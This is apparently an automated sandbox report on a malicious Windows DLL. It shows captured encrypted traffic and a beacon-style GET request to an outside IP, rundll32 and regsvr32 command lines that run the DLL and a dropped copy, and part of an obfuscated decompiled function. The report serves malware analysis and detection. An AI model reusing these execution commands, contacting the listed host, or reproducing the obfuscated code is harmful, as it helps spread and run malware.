b0 3c ab d8 0a c0 35 bd 40 d5 9b a0 19 26 a1 17 ca 83 b0 e1 bd 01 71 87 e4 db 3f ee 8a 29 6d b5 fe a6 ac 7b 53 fb 1e 0b 63 c2 03 ce c9 62 d9 12 bd 44 89 34 f6 fc 38 Data Ascii: XU=T{eb[uH>ei{M^EOMM(;}Q(Jj)5E+;(kQ$ T{ax]}gj_c3~Y-zF_B wC7NskF0amf#x1<5@&q?)m{ScbD48
2021-12-02 23:42:43 UTC	69	IN	Data Raw: 86 6d f8 97 53 fe a5 04 7e d5 24 f0 d1 85 68 c4 70 f7 a5 7e b5 95 62 0f 0d 75 3c 4a f7 a7 cd 8b 4b 17 3f 41 65 db 41 8a 2f a9 54 55 c1 3d 40 a7 25 a3 92 cf b5 63 33 b1 1d 05 23 30 00 2e 31 6d 46 cb 41 b6 56 3b 85 cc f6 14 00 9e 65 1d 86 84 d7 68 ad 71 5a 7b 52 3e f4 66 d9 56 1f 2a f2 ba 8c 74 31 91 52 6b 04 d7 b9 76 c5 df 94 94 3f bf 0d ab 20 c8 a3 0e aa f2 3f 50 e1 a3 03 58 78 71 f3 a0 3b 9a 5f 49 a5 38 a1 e6 eb 4b e9 4e df 9a d0 aa d9 32 27 03 e7 4d 66 d8 89 27 2c 4f f0 7e a6 89 60 84 97 d7 1d 07 52 68 f3 30 50 aa 34 00 e0 82 46 b1 40 db 7f 2f 30 e8 35 e5 a8 0d 8c e4 fa d1 22 33 ea 6b 00 d6 b7 21 be 66 b6 a8 5b ab 29 d9 d4 54 1e 1f df f8 5b 88 3b b2 f9 d7 ee 2a 05 4f 0c ac a1 fd c7 13 36 fc a7 d3 6e 30 69 84 52 b0 99 e8 6a 54 5d e7 1e 6e 40 64 05 32 dd Data Ascii: mS~$hp~bu<JK?AeA/TU=@%c3#0.1mFAV;ehqZ{R>fVt1Rkv? ?PXxq;_I8KN2'Mf',O~`Rh0P4F@/05"3k!f[)T[;O6n0iRjT]n@d2
2021-12-02 23:42:43 UTC	71	IN	Data Raw: 88 79 33 19 91 e9 57 5d 58 47 b3 22 08 23 66 81 4a c0 12 a4 90 0e 1a 89 b4 6e 04 88 d1 51 39 72 7a 8d 6b 0d 65 14 f7 cb 11 c3 95 a0 0e 61 bd 0b 77 10 01 ce a6 15 ba 30 af 32 8f 2b 6c 68 13 80 eb fc d0 0a f8 27 a1 d8 d1 91 21 d6 81 04 4a 11 bf fc 1a f3 7c 43 bf 5a d0 f9 86 e2 b9 48 de 88 20 c8 23 04 1e a2 92 cf fe 50 28 09 7d 88 09 e2 a3 67 e8 fd 1a ae 5b 36 cc 35 8b a2 40 3d 20 d3 db 3b bd bf 32 fd 2a d3 9d d6 79 58 7c 8f 15 bc 83 45 71 31 56 80 b8 79 55 ad af e4 5f 8d f1 ee 36 c4 52 85 28 ec b6 ce 16 5f ca 45 28 9c 81 30 ca 68 0b c0 82 76 0d d8 8a 70 cc 39 59 0c 48 3a e6 81 f6 97 6e 12 a7 70 15 05 11 ec 99 56 db 75 08 c6 01 ee 54 d1 8e 00 83 d7 43 44 2f 34 aa b1 db a0 3d ab 20 00 e8 d5 cc 84 60 f5 1b 83 45 80 80 f3 f6 6c 7d eb ca 49 d7 31 43 a4 d0 3d 41 Data Ascii: y3W]XG"#fJnQ9rzkeaw02+lh'!J\|CZH #P(}g[65@= ;2*yX\|Eq1VyU_6R(_E(0hvp9YH:npVuTCD/4= `El}I1C=A

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49881	172.104.227.98	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 23:43:28 UTC	71	OUT	GET /fcNtqWRYEAvIh HTTP/1.1 Cookie: wFFCSxt=KroKbMrLxdquGLAVpD8mzOTL6+CJEBylxML8+8LJKbm2NFSJfWyg+Ob4gDvMFIJSB8JkauSCmzenkWfybqLjINgruWQ9hyEz6LBdkvbPAZKalyvPo/EjstrhYIOzCYE0U9F6ESIQNH6mPBh1c7AWHgfaTWG0bJf0yIMhiqP3oKSNSNHW+RMKCwRHRmh4DzBf2Vp20YcxrDb6uOijN0eQ3rjnJQu9vDXRscGluLYAx9sKze0sCBY= Host: 172.104.227.98 Connection: Keep-Alive Cache-Control: no-cache
2021-12-02 23:43:28 UTC	72	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Dec 2021 23:43:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2021-12-02 23:43:28 UTC	72	IN	Data Raw: 65 62 0d 0a f7 c4 7c 9f 8a 9c d8 5b ad a0 b8 8c cc fb 06 08 09 89 d4 b7 fe 12 4b da c9 39 69 0b 2f 7c 4d c8 13 6c 88 45 1e 8c 83 b3 10 89 20 07 15 1b 8d f1 01 64 c9 29 94 a6 5b 38 63 bd 3f 30 61 41 50 21 c4 75 78 bd 2c 38 52 89 ed a3 c5 de 47 3e ee 88 a5 4b 22 b1 9b 17 b2 22 e2 da 7e 25 66 e4 b5 68 de 50 1e a9 00 79 c0 4a e7 6e d3 6c 9b 76 d6 9a ec 2d a1 4c d8 12 a7 2e 48 e0 db fa ee f9 dd 1c 91 5b 80 47 d1 63 4a 40 c1 af ea 1d 9e 5b ac 72 3f e9 56 ff 41 4a a6 3c be 1e 18 81 c6 de 22 b9 ca e8 ac 83 55 d8 a5 d8 b0 76 5b 35 40 1e 39 1b 95 1d 94 1b c4 92 79 03 49 1b e4 71 6e bd b9 d3 7e a2 0f 85 86 72 44 97 e0 8e 43 e6 11 4f 8b f5 a1 41 c3 47 41 89 3d 03 86 76 97 82 f0 ba 9c 57 5e 13 b9 19 ca 66 4c dd bd d1 c1 0d 0a 30 0d 0a 0d 0a Data Ascii: eb\|[K9i/\|MlE d)[8c?0aAP!ux,8RG>K""~%fhPyJnlv-L.H[GcJ@[r?VAJ<"Uv[5@9yIqn~rDCOAGA=vW^fL0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4252 Parent PID: 5528

General

Start time:	00:42:20
Start date:	03/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll"
Imagebase:	0x120000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2964 Parent PID: 4252

General

Start time:	00:42:20
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5036 Parent PID: 4252

General

Start time:	00:42:20
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\Bccw1xUJah.dll
Imagebase:	0xcf0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1320 Parent PID: 2964

General

Start time:	00:42:21
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2856 Parent PID: 4252

General

Start time:	00:42:21
Start date:	03/12/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff7a3980000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5544 Parent PID: 4252

General

Start time:	00:42:21
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,DllRegisterServer
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4620 Parent PID: 2856

General

Start time:	00:42:22
Start date:	03/12/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:17410 /prefetch:2
Imagebase:	0x8e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6220 Parent PID: 4252

General

Start time:	00:42:25
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_codec_set_threads@8
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6256 Parent PID: 556

General

Start time:	00:42:26
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6348 Parent PID: 4252

General

Start time:	00:42:30
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_create_compress@4
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6424 Parent PID: 556

General

Start time:	00:42:35
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6648 Parent PID: 556

General

Start time:	00:42:38
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6700 Parent PID: 556

General

Start time:	00:42:39
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 6784 Parent PID: 556

General

Start time:	00:42:39
Start date:	03/12/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff6d1370000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6804 Parent PID: 556

General

Start time:	00:42:40
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 7020 Parent PID: 1320

General

Start time:	00:42:45
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 7048 Parent PID: 5036

General

Start time:	00:42:45
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 7112 Parent PID: 5544

General

Start time:	00:42:47
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Frzzoul\kwwohiulewmulvk.tlr",MlQLn
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5048 Parent PID: 6220

General

Start time:	00:42:48
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 768 Parent PID: 6348

General

Start time:	00:42:54
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1268 Parent PID: 556

General

Start time:	00:42:56
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 6436 Parent PID: 1268

General

Start time:	00:42:57
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4252 -ip 4252
Imagebase:	0x810000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1972 Parent PID: 556

General

Start time:	00:42:59
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5320 Parent PID: 4252

General

Start time:	00:43:00
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 272
Imagebase:	0x810000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5364 Parent PID: 556

General

Start time:	00:43:05
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 3000 Parent PID: 7112

General

Start time:	00:43:06
Start date:	03/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Frzzoul\kwwohiulewmulvk.tlr",DllRegisterServer
Imagebase:	0xe40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7008 Parent PID: 556

General

Start time:	00:43:34
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 4612 Parent PID: 6804

General

Start time:	00:43:41
Start date:	03/12/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7374e0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6760 Parent PID: 4612

General

Start time:	00:43:41
Start date:	03/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7112 Parent PID: 556

General

Start time:	00:44:44
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4524 Parent PID: 556

General

Start time:	00:45:02
Start date:	03/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4252 Parent PID: 5528 loaddll32.exeCOMMON

Executed Functions

Function 1001CFAA, Relevance: 10.3, Strings: 8, Instructions: 346
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001CFAA() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t371;
				signed int _t375;
				signed int _t388;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t402;
				signed int* _t425;
				void* _t426;
				signed int _t430;
				signed short* _t433;
				signed int* _t434;

				_t434 =  &_v1720;
				_v1568 = 0x78231c;
				_t388 = 0;
				_v1564 = 0;
				_v1664 = 0xc17f87;
				_v1664 = _v1664 + 0xffffc107;
				_v1664 = _v1664 + 0x2ee1;
				_v1664 = _v1664 ^ 0x00c16f46;
				_v1676 = 0xe87519;
				_v1676 = _v1676 + 0xffff54c6;
				_v1676 = _v1676 ^ 0xc998315c;
				_v1676 = _v1676 >> 9;
				_v1676 = _v1676 ^ 0x0069f2e4;
				_v1684 = 0xf22877;
				_v1684 = _v1684 << 3;
				_v1684 = _v1684 + 0xffff884b;
				_v1684 = _v1684 >> 4;
				_v1684 = _v1684 ^ 0x007b3bed;
				_v1604 = 0xf9614d;
				_v1604 = _v1604 * 0x70;
				_t426 = 0x6fc51b;
				_v1604 = _v1604 ^ 0x6d134a68;
				_v1692 = 0x184add;
				_t430 = 0x5e;
				_v1692 = _v1692 / _t430;
				_v1692 = _v1692 << 8;
				_v1692 = _v1692 ^ 0xfbdc2e3c;
				_v1692 = _v1692 ^ 0xfb9661b3;
				_v1608 = 0x6df58b;
				_t390 = 0x35;
				_v1608 = _v1608 / _t390;
				_v1608 = _v1608 ^ 0x000b7124;
				_v1668 = 0xba85b6;
				_t391 = 0x11;
				_v1668 = _v1668 * 0x55;
				_v1668 = _v1668 + 0xa81b;
				_v1668 = _v1668 ^ 0x3de36e87;
				_v1648 = 0x63c1a3;
				_v1648 = _v1648 / _t391;
				_v1648 = _v1648 * 0x46;
				_v1648 = _v1648 ^ 0x01970e33;
				_v1656 = 0x369849;
				_v1656 = _v1656 + 0xc3b7;
				_v1656 = _v1656 + 0xffff8048;
				_v1656 = _v1656 ^ 0x0030342c;
				_v1672 = 0x91c846;
				_v1672 = _v1672 * 0x11;
				_v1672 = _v1672 >> 4;
				_v1672 = _v1672 ^ 0x009762fc;
				_v1592 = 0x49b827;
				_v1592 = _v1592 + 0xffffd9d4;
				_v1592 = _v1592 ^ 0x0049dd11;
				_v1584 = 0xcc6a9f;
				_v1584 = _v1584 + 0xc737;
				_v1584 = _v1584 ^ 0x00c85ba7;
				_v1640 = 0x9fda4;
				_v1640 = _v1640 + 0xffff1ea1;
				_v1640 = _v1640 | 0x0dd931ee;
				_v1640 = _v1640 ^ 0x0dd8a8e8;
				_v1580 = 0x31661b;
				_v1580 = _v1580 / _t430;
				_v1580 = _v1580 ^ 0x0007c960;
				_v1632 = 0x268ad6;
				_v1632 = _v1632 >> 0xa;
				_v1632 = _v1632 ^ 0xc8a80546;
				_v1632 = _v1632 ^ 0xc8aa3315;
				_v1572 = 0xb105a4;
				_v1572 = _v1572 + 0xffff2d3a;
				_v1572 = _v1572 ^ 0x00b5083a;
				_v1700 = 0x1a5418;
				_v1700 = _v1700 | 0x05df2665;
				_t392 = 0x4d;
				_v1700 = _v1700 * 0x6b;
				_v1700 = _v1700 + 0x41d6;
				_v1700 = _v1700 ^ 0x746232ac;
				_v1636 = 0x363353;
				_v1636 = _v1636 + 0x57ec;
				_v1636 = _v1636 | 0x0172e7de;
				_v1636 = _v1636 ^ 0x017a6c1e;
				_v1660 = 0x91e5a0;
				_v1660 = _v1660 + 0xfffff825;
				_v1660 = _v1660 * 0xa;
				_v1660 = _v1660 ^ 0x05b1d988;
				_v1712 = 0x218f62;
				_v1712 = _v1712 >> 4;
				_v1712 = _v1712 + 0xffff02f9;
				_v1712 = _v1712 | 0xff490975;
				_v1712 = _v1712 ^ 0xff44d907;
				_v1696 = 0xc110d;
				_v1696 = _v1696 + 0xffff58b7;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 * 6;
				_v1696 = _v1696 ^ 0x88fda35e;
				_v1588 = 0x6ef8d7;
				_v1588 = _v1588 | 0xf473d195;
				_v1588 = _v1588 ^ 0xf47b09d0;
				_v1680 = 0xed7e0e;
				_v1680 = _v1680 ^ 0x434efb56;
				_v1680 = _v1680 >> 0xa;
				_v1680 = _v1680 << 0xb;
				_v1680 = _v1680 ^ 0x874fe8d0;
				_v1620 = 0xa9becf;
				_v1620 = _v1620 ^ 0xf8f6c21e;
				_v1620 = _v1620 >> 5;
				_v1620 = _v1620 ^ 0x07c69297;
				_v1652 = 0xb9ead3;
				_v1652 = _v1652 / _t392;
				_v1652 = _v1652 >> 0xe;
				_v1652 = _v1652 ^ 0x0007240c;
				_v1688 = 0x89536f;
				_t393 = 0x57;
				_v1688 = _v1688 / _t393;
				_v1688 = _v1688 | 0x52e32e7f;
				_v1688 = _v1688 >> 0xd;
				_v1688 = _v1688 ^ 0x000a774f;
				_v1704 = 0xac0077;
				_t394 = 0x66;
				_v1704 = _v1704 * 0x31;
				_v1704 = _v1704 / _t394;
				_v1704 = _v1704 << 4;
				_v1704 = _v1704 ^ 0x0520240c;
				_v1628 = 0xbe9b68;
				_v1628 = _v1628 >> 0xc;
				_v1628 = _v1628 | 0xd7d2df5f;
				_v1628 = _v1628 ^ 0xd7d8324c;
				_v1644 = 0x68f985;
				_v1644 = _v1644 ^ 0xd6816e3c;
				_v1644 = _v1644 + 0xfffff4f2;
				_v1644 = _v1644 ^ 0xd6eeb121;
				_v1600 = 0xaa968a;
				_v1600 = _v1600 >> 0xb;
				_v1600 = _v1600 ^ 0x00067efe;
				_v1720 = 0x33f0dd;
				_v1720 = _v1720 | 0xe5981f2e;
				_v1720 = _v1720 ^ 0xbb7dd242;
				_v1720 = _v1720 + 0xc627;
				_v1720 = _v1720 ^ 0x5ec37826;
				_v1708 = 0xe3cdf0;
				_v1708 = _v1708 * 0x7d;
				_v1708 = _v1708 ^ 0xd40d4bf5;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x0bbc72c3;
				_v1716 = 0x801f9a;
				_v1716 = _v1716 + 0x5f1f;
				_v1716 = _v1716 * 0x4d;
				_v1716 = _v1716 * 0x4f;
				_v1716 = _v1716 ^ 0xed45b7a1;
				_v1576 = 0x4c4fc5;
				_v1576 = _v1576 + 0xffff10f0;
				_v1576 = _v1576 ^ 0x00414224;
				_v1612 = 0x7be2b1;
				_v1612 = _v1612 | 0xc1545da7;
				_v1612 = _v1612 ^ 0xc1729c47;
				_t433 = _v1612;
				_v1616 = 0x938adf;
				_v1616 = _v1616 + 0xffffa8bd;
				_v1616 = _v1616 ^ 0xbc88fdb3;
				_v1616 = _v1616 ^ 0xbc19083a;
				_v1596 = 0x8428a8;
				_v1596 = _v1596 + 0x5faf;
				_v1596 = _v1596 ^ 0x00887c5c;
				_v1624 = 0xfbb3d6;
				_v1624 = _v1624 ^ 0x8fb8b3a9;
				_v1624 = _v1624 ^ 0x35a71c13;
				_v1624 = _v1624 ^ 0xbae72813;
				while(_t426 != 0x6fc51b) {
					if(_t426 == 0x180b4a5) {
						_t371 = _t433;
						__eflags =  *_t433 - _t388;
						while(__eflags != 0) {
							__eflags =  *_t371 - 0x2c;
							if( *_t371 == 0x2c) {
								_t425 =  &_v1560;
								while(1) {
									_t371 =  &(_t371[1]);
									_t402 =  *_t371 & 0x0000ffff;
									__eflags = _t402;
									if(_t402 == 0) {
										break;
									}
